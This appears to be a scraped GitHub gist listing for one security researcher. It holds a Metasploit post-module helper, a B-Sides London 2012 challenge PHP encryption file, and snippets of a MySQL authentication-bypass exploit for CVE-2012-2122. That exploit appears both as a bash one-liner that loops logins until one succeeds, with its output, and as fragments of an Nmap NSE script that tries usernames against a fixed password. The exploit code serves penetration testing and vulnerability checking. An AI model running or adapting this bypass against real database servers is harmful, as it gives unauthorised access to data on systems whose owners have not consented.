Skip to content

Instantly share code, notes, and snippets.

View marcwickenden's full-sized avatar

MW marcwickenden

View GitHub Profile
@marcwickenden
marcwickenden / gist:1719670
Created February 1, 2012 21:46
stat_file method added to lib/msf/core/post/file.rb
def stat_file(file_name)
data = []
stat = {}
if session.type == "meterpreter"
raise "I think you can do this with session.fs.file.stat"
elsif session.respond_to? :shell_command_token
print_debug("platform is #{session.platform}")
case session.platform
when /windows/
@marcwickenden
marcwickenden / encryption.php
Created April 29, 2012 23:45
Security B-Sides London 2012 Challenge 4
<?php
// encryption functions used for login
function encrypt($value, $key){
if(!$value){return false;}
$text = $value;
$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
$ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $text, MCRYPT_MODE_ECB, $iv);
return trim(base64_encode($ciphertext)); //encode for db
}
@marcwickenden
marcwickenden / file1.txt
Created June 12, 2012 15:05
bash poc for MySQL bug
ubuntu@ip-10-227-118-34:~$ for i in `seq 1 1000`; do mysql -u root --password=cve-2012-2122 -h 127.0.0.1 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 424
Server version: 5.5.22-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
@marcwickenden
marcwickenden / gist:2918117
Created June 12, 2012 15:13
mysql-auth-bypass loop
for username in usernames do
stdnse.print_debug( "Trying %s ...", username )
-- try up to 300 times to trigger the vuln
for i = 0, 300, 1 do
stdnse.print_debug(2, "attempt number %d", i )
local status, response = socket:connect(host, port)
if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end
@marcwickenden
marcwickenden / gist:2918119
Created June 12, 2012 15:14
mysql-auth-bypass greeting
status, response = mysql.receiveGreeting( socket )
if ( not(status) ) then
stdnse.print_debug(3, SCRIPT_NAME)
socket:close()
return response
end
@marcwickenden
marcwickenden / gist:2918072
Created June 12, 2012 15:08
mysql-auth-bypass require statements
require 'shortport'
require 'stdnse'
require 'mysql'
require 'unpwdb'
@marcwickenden
marcwickenden / gist:2918098
Created June 12, 2012 15:10
mysql-auth-bypass portrule
portrule = shortport.port_or_service(3306, "mysql")
@marcwickenden
marcwickenden / gist:2918108
Created June 12, 2012 15:11
mysql-auth-bypass action
action = function( host, port )
local socket = nmap.new_socket()
local catch = function() socket:close() end
local try = nmap.new_try(catch)
local result = {}
@marcwickenden
marcwickenden / gist:2918113
Created June 12, 2012 15:12
mysql-auth-bypass timeout
-- set a reasonable timeout value
socket:set_timeout(5000)
-- get our usernames to try
local usernames = try(unpwdb.usernames())
local password = "cve-2012-2122"
@marcwickenden
marcwickenden / gist:2918123
Created June 12, 2012 15:15
mysql-auth-bypass login
status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt )
if response.errorcode == 0 then
table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) )
break
end